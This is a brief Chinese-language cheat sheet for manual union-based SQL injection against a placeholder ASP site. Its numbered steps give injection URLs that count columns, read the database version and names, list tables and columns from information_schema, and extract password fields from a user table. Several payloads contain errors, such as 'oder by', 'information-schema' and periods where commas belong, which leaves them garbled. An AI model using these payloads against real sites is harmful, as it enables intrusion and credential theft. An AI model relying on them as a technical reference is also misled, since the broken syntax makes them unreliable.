网站http://www.xxxx.com/xxxx/1.Asp?id=1
一、常规注入
1.猜字段http://www.xxxx.com/xxxx/1.Asp?id=1+oder+by+X X=(1.2.3.4.5.6.....)直至网站访问正常为止。
2.查询数据库等http://www.xxxx.com/xxxx/1.Asp?id=1+union+select 1.2.3.database().version() 获取数据库等信息
或union+select+schema_name+from+information-schema.schemata猜数据库
3.获取数据库下面的所有表明信息 http://www.xxxx.com/xxxx/1.Aspid=1
+union+select+1.2.3.4.from+information_schema.tables+where+table_schema='数据库名字'
4.获取表明下的用户信息http://www.xxxx.com/xxxx/1.Aspid=1
+union+select+1.2.3.4.from+information_columns.name+where+table_name='表明'
5.获取指定用户数据信息
http://www.xxxx.com/xxxx/1.Aspid=1+union+select+1.password.3.4.from+用户名